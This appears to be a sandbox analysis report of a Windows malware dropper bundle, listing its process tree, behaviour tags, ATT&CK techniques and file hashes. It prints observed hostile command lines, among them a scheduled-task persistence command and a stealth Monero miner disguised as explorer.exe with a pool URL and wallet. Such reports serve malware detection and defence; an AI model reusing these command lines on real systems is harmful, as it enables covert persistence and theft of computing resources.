Depth 11: C:\Windows\SysWOW64\msiexec.exe
Command: "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\gg35e2bq.zoa\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\gg35e2bq.zoa\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632000318 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
- Enumerates connected drives
Depth 9: C:\Windows\System32\cmd.exe
Command: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0jrt5ohb.jsz\anyname.exe & exit
Depth 10: C:\Users\Admin\AppData\Local\Temp\0jrt5ohb.jsz\anyname.exe
Command: C:\Users\Admin\AppData\Local\Temp\0jrt5ohb.jsz\anyname.exe
Depth 9: C:\Windows\System32\cmd.exe
Command: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pee2ejmm.nk5\gcleaner.exe /mixfive & exit
Depth 10: C:\Users\Admin\AppData\Local\Temp\pee2ejmm.nk5\gcleaner.exe
Command: C:\Users\Admin\AppData\Local\Temp\pee2ejmm.nk5\gcleaner.exe /mixfive
Depth 11: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -u -p 9168 -s 244
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
Depth 9: C:\Windows\System32\cmd.exe
Command: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fnkpkf24.saq\autosubplayer.exe /S & exit
- Suspicious use of SetWindowsHookEx
Depth 4: C:\Windows\SysWOW64\cmd.exe
Command: C:\Windows\system32\cmd.exe /c Sat205eb4a2ece877a.exe
Depth 5: C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat205eb4a2ece877a.exe
Command: Sat205eb4a2ece877a.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Depth 6: C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
Command: "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
- Executes dropped EXE
Depth 7: C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
Command: "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Depth 8: C:\ProgramData\3411592.exe
Command: "C:\ProgramData\3411592.exe"
Depth 8: C:\ProgramData\4888429.exe
Command: "C:\ProgramData\4888429.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
Depth 9: C:\ProgramData\4888429.exe
Command: "C:\ProgramData\4888429.exe"
Depth 9: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 1068
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
Depth 8: C:\ProgramData\6470069.exe
Command: "C:\ProgramData\6470069.exe"
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
Depth 8: C:\ProgramData\7625938.exe
Command: "C:\ProgramData\7625938.exe"
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
Depth 7: C:\Users\Admin\AppData\Local\Temp\2.exe
Command: "C:\Users\Admin\AppData\Local\Temp\2.exe"
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Depth 8: C:\Windows\system32\WerFault.exe
Command: C:\Windows\system32\WerFault.exe -u -p 4748 -s 1724
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
Depth 7: C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
Command: "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
- Executes dropped EXE
Depth 8: C:\Windows\System32\cmd.exe
Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
Depth 9: C:\Windows\system32\schtasks.exe
Command: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
- Creates scheduled task(s)
Depth 8: C:\Users\Admin\AppData\Roaming\services64.exe
Command: "C:\Users\Admin\AppData\Roaming\services64.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
Depth 9: C:\Windows\System32\cmd.exe
Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
Depth 10: C:\Windows\system32\schtasks.exe
Command: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
- Creates scheduled task(s)
Depth 9: C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
Command: "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Depth 9: C:\Windows\explorer.exe
Command: C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
Depth 7: C:\Users\Admin\AppData\Local\Temp\setup.exe
Command: "C:\Users\Admin\AppData\Local\Temp\setup.exe"
Depth 7: C:\Users\Admin\AppData\Local\Temp\askinstall58.exe
Command: "C:\Users\Admin\AppData\Local\Temp\askinstall58.exe"
- Executes dropped EXE
Depth 7: C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMik18.exe
Command: "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMik18.exe"
- Executes dropped EXE
Depth 8: C:\Users\Admin\AppData\Local\Temp\tmpB35D_tmp.exe
Command: "C:\Users\Admin\AppData\Local\Temp\tmpB35D_tmp.exe"
- Suspicious use of SetThreadContext
Depth 9: C:\Users\Admin\AppData\Local\Temp\tmpB35D_tmp.exe
Command: C:\Users\Admin\AppData\Local\Temp\tmpB35D_tmp.exe
Depth 7: C:\Users\Admin\AppData\Local\Temp\6.exe
Command: "C:\Users\Admin\AppData\Local\Temp\6.exe"
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
Depth 7: C:\Users\Admin\AppData\Local\Temp\setup_2.exe
Command: "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
- Executes dropped EXE
Depth 8: C:\Users\Admin\AppData\Local\Temp\is-RF37F.tmp\setup_2.tmp
Command: "C:\Users\Admin\AppData\Local\Temp\is-RF37F.tmp\setup_2.tmp" /SL5="$5028A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
- Loads dropped DLL
Depth 9: C:\Users\Admin\AppData\Local\Temp\setup_2.exe
Command: "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
Depth 10: C:\Users\Admin\AppData\Local\Temp\is-SNQQ4.tmp\setup_2.tmp
Command: "C:\Users\Admin\AppData\Local\Temp\is-SNQQ4.tmp\setup_2.tmp" /SL5="$20336,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
Depth 11: C:\Users\Admin\AppData\Local\Temp\is-UHRB0.tmp\postback.exe
Command: "C:\Users\Admin\AppData\Local\Temp\is-UHRB0.tmp\postback.exe" ss1
Depth 7: C:\Users\Admin\AppData\Local\Temp\3002.exe
Command: "C:\Users\Admin\AppData\Local\Temp\3002.exe"
- Executes dropped EXE
Depth 8: C:\Users\Admin\AppData\Local\Temp\3002.exe
Command: "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
Depth 7: C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
Command: "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
Depth 7: C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
Command: "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
Depth 4: C:\Windows\SysWOW64\cmd.exe
Command: C:\Windows\system32\cmd.exe /c Sat20627fa1c49.exe
- Suspicious use of WriteProcessMemory
Depth 5: C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20627fa1c49.exe
Command: Sat20627fa1c49.exe
- Executes dropped EXE
Depth 6: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 328
- Program crash
Depth 4: C:\Windows\SysWOW64\cmd.exe
Command: C:\Windows\system32\cmd.exe /c Sat20ed203af5.exe
Depth 5: C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20ed203af5.exe
Command: Sat20ed203af5.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Depth 6: C:\Users\Admin\AppData\Roaming\1389700.scr
Command: "C:\Users\Admin\AppData\Roaming\1389700.scr" /S
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Depth 6: C:\Users\Admin\AppData\Roaming\6389059.scr
Command: "C:\Users\Admin\AppData\Roaming\6389059.scr" /S
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
Depth 6: C:\Users\Admin\AppData\Roaming\3379467.scr
Command: "C:\Users\Admin\AppData\Roaming\3379467.scr" /S
Depth 7: C:\Users\Admin\AppData\Roaming\3379467.scr
Command: "C:\Users\Admin\AppData\Roaming\3379467.scr"
- Executes dropped EXE
Depth 7: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 1068
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
Depth 6: C:\Users\Admin\AppData\Roaming\5141881.scr
Command: "C:\Users\Admin\AppData\Roaming\5141881.scr" /S
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
Depth 4: C:\Windows\SysWOW64\cmd.exe
Command: C:\Windows\system32\cmd.exe /c Sat2077373f11706fb7.exe
Depth 5: C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat2077373f11706fb7.exe
Command: Sat2077373f11706fb7.exe
- Executes dropped EXE
Depth 4: C:\Windows\SysWOW64\cmd.exe
Command: C:\Windows\system32\cmd.exe /c Sat2026ef0d60b87a3f5.exe
Depth 5: C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat2026ef0d60b87a3f5.exe
Command: Sat2026ef0d60b87a3f5.exe
- Executes dropped EXE
- Suspicious use of SetThreadContext
Depth 6: C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat2026ef0d60b87a3f5.exe
Command: C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat2026ef0d60b87a3f5.exe
- Executes dropped EXE
Depth 4: C:\Windows\SysWOW64\cmd.exe
Command: C:\Windows\system32\cmd.exe /c Sat20de8d8504.exe
Depth 5: C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20de8d8504.exe
Command: Sat20de8d8504.exe
- Executes dropped EXE
Depth 6: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -u -p 5248 -s 248
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
Depth 4: C:\Windows\SysWOW64\cmd.exe
Command: C:\Windows\system32\cmd.exe /c Sat200240b71b.exe
Depth 5: C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat200240b71b.exe
Command: Sat200240b71b.exe
- Executes dropped EXE
Depth 6: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 260
- Program crash
Depth 4: C:\Windows\SysWOW64\cmd.exe
Command: C:\Windows\system32\cmd.exe /c Sat20545a92617f.exe /mixone
Depth 5: C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20545a92617f.exe
Command: Sat20545a92617f.exe /mixone
- Executes dropped EXE
Depth 6: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -u -p 3824 -s 244
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
Depth 4: C:\Windows\SysWOW64\cmd.exe
Command: C:\Windows\system32\cmd.exe /c Sat20873bc74eb80e0.exe
- Suspicious use of WriteProcessMemory
Depth 1: C:\Windows\System32\sihclient.exe
Command: C:\Windows\System32\sihclient.exe /cv 1PsfHjy/6UuX87LF/E3WAg.0.2
- Modifies data under HKEY_USERS
Depth 1: C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20873bc74eb80e0.exe
Command: Sat20873bc74eb80e0.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Depth 2: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -u -p 4792 -s 1872
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4824 -ip 4824
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3824 -ip 3824
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5248 -ip 5248
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5132 -ip 5132
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Windows\system32\rundll32.exe
Command: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
- Process spawned unexpected child process
Depth 2: C:\Windows\SysWOW64\rundll32.exe
Command: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
- Loads dropped DLL
Depth 3: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 456
- Program crash
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5528 -ip 5528
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 860 -ip 860
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Windows\system32\WerFault.exe
Command: C:\Windows\system32\WerFault.exe -pss -s 388 -p 4748 -ip 4748
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4792 -ip 4792
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6352 -ip 6352
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 6092 -ip 6092
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3652 -ip 3652
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 5060 -ip 5060
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4280 -ip 4280
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 4288 -ip 4288
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Windows\system32\WerFault.exe
Command: C:\Windows\system32\WerFault.exe -pss -s 520 -p 1152 -ip 1152
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 3060 -ip 3060
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Windows\System32\svchost.exe
Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
- Modifies data under HKEY_USERS
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5144 -ip 5144
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
Depth 1: C:\Windows\system32\svchost.exe
Command: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
Depth 1: C:\Windows\system32\rundll32.exe
Command: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
- Process spawned unexpected child process
Depth 2: C:\Windows\SysWOW64\rundll32.exe
Command: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
- Loads dropped DLL
Depth 3: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 456
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5884 -ip 5884
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 5324 -ip 5324
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Windows\System32\svchost.exe
Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
- Executes dropped EXE
Depth 1: C:\Users\Admin\AppData\Local\Temp\7A66.exe
Command: C:\Users\Admin\AppData\Local\Temp\7A66.exe
- Suspicious use of SetThreadContext
Depth 2: C:\Users\Admin\AppData\Local\Temp\7A66.exe
Command: C:\Users\Admin\AppData\Local\Temp\7A66.exe
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
Depth 1: C:\Users\Admin\AppData\Local\Temp\9C56.exe
Command: C:\Users\Admin\AppData\Local\Temp\9C56.exe
- Suspicious use of SetThreadContext
Depth 2: C:\Users\Admin\AppData\Local\Temp\9C56.exe
Command: C:\Users\Admin\AppData\Local\Temp\9C56.exe
Depth 1: C:\Windows\System32\Conhost.exe
Command: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- Executes dropped EXE
Depth 1: C:\Users\Admin\AppData\Local\Temp\CD79.exe
Command: C:\Users\Admin\AppData\Local\Temp\CD79.exe
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
Depth 1: C:\Users\Admin\AppData\Local\Temp\37EC.exe
Command: C:\Users\Admin\AppData\Local\Temp\37EC.exe
Depth 2: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -u -p 10000 -s 236
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
Depth 1: C:\Users\Admin\AppData\Local\Temp\543F.exe
Command: C:\Users\Admin\AppData\Local\Temp\543F.exe
- Adds Run key to start application
Depth 2: C:\Windows\system32\WerFault.exe
Command: C:\Windows\system32\WerFault.exe -u -p 8992 -s 1688
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 10000 -ip 10000
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Users\Admin\AppData\Local\Temp\798B.exe
Command: C:\Users\Admin\AppData\Local\Temp\798B.exe
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 8588 -ip 8588
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Windows\system32\WerFault.exe
Command: C:\Windows\system32\WerFault.exe -pss -s 776 -p 8992 -ip 8992
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 808 -p 9168 -ip 9168
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Windows\system32\msiexec.exe
Command: C:\Windows\system32\msiexec.exe /V
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
Depth 2: C:\Windows\syswow64\MsiExec.exe
Command: C:\Windows\syswow64\MsiExec.exe -Embedding 46455126B97E7A28E5F39C8EA2818575 C
- Loads dropped DLL
Depth 2: C:\Windows\syswow64\MsiExec.exe
Command: C:\Windows\syswow64\MsiExec.exe -Embedding 29E1D0234777D899071C07C529471E9C
- Blocklisted process makes network request
- Loads dropped DLL
Depth 3: C:\Windows\SysWOW64\taskkill.exe
Command: "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
- Kills process with taskkill
Depth 2: C:\Windows\syswow64\MsiExec.exe
Command: C:\Windows\syswow64\MsiExec.exe -Embedding 127F402607D5A5E3C083F061F8A8807E E Global\MSI0000
- Loads dropped DLL
- Drops file in Windows directory
Depth 1: C:\Windows\system32\rundll32.exe
Command: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
- Process spawned unexpected child process
Depth 2: C:\Windows\SysWOW64\rundll32.exe
Command: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
- Loads dropped DLL
Depth 3: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -u -p 10848 -s 460
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
Depth 1: C:\Users\Admin\AppData\Local\Temp\A2CF.exe
Command: C:\Users\Admin\AppData\Local\Temp\A2CF.exe
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 10848 -ip 10848
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Users\Admin\AppData\Local\Temp\BF31.exe
Command: C:\Users\Admin\AppData\Local\Temp\BF31.exe
Depth 2: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -u -p 11564 -s 260
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
Depth 1: C:\Users\Admin\AppData\Local\Temp\C85A.exe
Command: C:\Users\Admin\AppData\Local\Temp\C85A.exe
Depth 2: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -u -p 11768 -s 236
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
Depth 1: C:\Windows\System32\CompPkgSrv.exe
Command: C:\Windows\System32\CompPkgSrv.exe -Embedding
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 11564 -ip 11564
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 776 -p 11768 -ip 11768
- Suspicious use of NtCreateProcessExOtherParentProcess
Depth 1: C:\Users\Admin\AppData\Local\Temp\41F0.exe
Command: C:\Users\Admin\AppData\Local\Temp\41F0.exe
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
Depth 1: C:\Windows\system32\svchost.exe
Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
Depth 1: C:\Windows\System32\svchost.exe
Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Depth 1: C:\Windows\System32\svchost.exe
Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Depth 1: C:\Windows\System32\svchost.exe
Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Modify Existing Service: 1
- Registry Run Keys / Startup Folder: 1
- Scheduled Task: 1
Defense Evasion
- Modify Registry: 3
- Disabling Security Tools: 1
- Virtualization/Sandbox Evasion: 1
- Install Root Certificate: 1
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exeMD5
93460c75de91c3601b4a47d2b99d8f94
SHA1f2e959a3291ef579ae254953e62d098fe4557572
SHA2560fdba84fe8ed2cf97023c544d3f0807dbb12840c8e7d445a3a4f55174d78b5b2
SHA5124370ae1a1fc10c91593839c51d0fbae5c0838692f95e03cac315882b026e70817b238f7fe7d9897049856469b038acc8ccfd73aae1af5775bfef35bde2bf7856
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exeMD5
fcb98728cd3edf57563d8b75f84ec381
SHA1c4c785696f314cc3f33543350acebbd612b0ce6b
SHA25678d808c002e9119a719d9c8cbd1840514a79941a48f77f003995f81841b2a9d3
SHA5124a4b79383ee661760a25ce9edb304731bbbab66eb7cf9fc4203aa14e5501739476313ff782431851e3f424c0977138d9a368d679491edf162cd9e3657f92f6f7
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exeMD5
fcb98728cd3edf57563d8b75f84ec381
SHA1c4c785696f314cc3f33543350acebbd612b0ce6b
SHA25678d808c002e9119a719d9c8cbd1840514a79941a48f77f003995f81841b2a9d3
SHA5124a4b79383ee661760a25ce9edb304731bbbab66eb7cf9fc4203aa14e5501739476313ff782431851e3f424c0977138d9a368d679491edf162cd9e3657f92f6f7
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exeMD5
539aa376a378815cdff9c16dd1614224
SHA1409da5edf5297a3607f2b5d9380b7361848b26cd
SHA256ac57d1cc1efd8e29229970eccfb00b3e7d1aff6230529995edef9392f284ad9c
SHA512bec0618f68054d5e3444ac211c9f70cabe5ee4331f0b19376b9c9319a9aad303bc3da09e2260e1548f271429cc7ff45e79007332ef60d29e022453b0e77007f5
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exeMD5
539aa376a378815cdff9c16dd1614224
SHA1409da5edf5297a3607f2b5d9380b7361848b26cd
SHA256ac57d1cc1efd8e29229970eccfb00b3e7d1aff6230529995edef9392f284ad9c
SHA512bec0618f68054d5e3444ac211c9f70cabe5ee4331f0b19376b9c9319a9aad303bc3da09e2260e1548f271429cc7ff45e79007332ef60d29e022453b0e77007f5
-
C:\Users\Admin\AppData\Local\Temp\is-AHL8S.tmp\Ze2ro.exeMD5
a211103a0726ce624e8ebebe8834ca6a
SHA136f7de11c41df04104d4e0dfa1a4c2ff13f757c6
SHA2565e62bbb3947e390eb71fecbb4bc63baf9f60e51d2e7d82bf55e89de25f60867b
SHA5121622c4efbed35649ffe7a0681250e7c261bd90315bac4d362e86ed9366745e5e66021d259c7394f86afa61334a4af9f66cf929a40e07d3f6cbfd6fad7e5f3efa
-
C:\Users\Admin\AppData\Local\Temp\is-AHL8S.tmp\Ze2ro.exeMD5
a211103a0726ce624e8ebebe8834ca6a
SHA136f7de11c41df04104d4e0dfa1a4c2ff13f757c6
SHA2565e62bbb3947e390eb71fecbb4bc63baf9f60e51d2e7d82bf55e89de25f60867b
SHA5121622c4efbed35649ffe7a0681250e7c261bd90315bac4d362e86ed9366745e5e66021d259c7394f86afa61334a4af9f66cf929a40e07d3f6cbfd6fad7e5f3efa
-
C:\Users\Admin\AppData\Local\Temp\is-AHL8S.tmp\idp.dllMD5
8f995688085bced38ba7795f60a5e1d3
SHA15b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35
-
C:\Users\Admin\AppData\Local\Temp\is-VQ9TR.tmp\Sat20fbae42a4.tmpMD5
206baca178d6ba6fbaff62dad0fbcc75
SHA14845757f4f4f42f5492befbbf2fc920a0947608e
SHA256dcb39cd6f7de41986c237d1747fb9b85867db69ab8ff1edbb9804c513efd5b2c
SHA5127326179ec0225978b0dc2b77d4e2c134f79aa68d2ad163919400c8614a31182c79fd7aef5ba9a99555b3fa19666718d64c41c3529bddc4a65f1df8ec391eb234
-
C:\Users\Admin\AppData\Local\Temp\is-VQ9TR.tmp\Sat20fbae42a4.tmpMD5
206baca178d6ba6fbaff62dad0fbcc75
SHA14845757f4f4f42f5492befbbf2fc920a0947608e
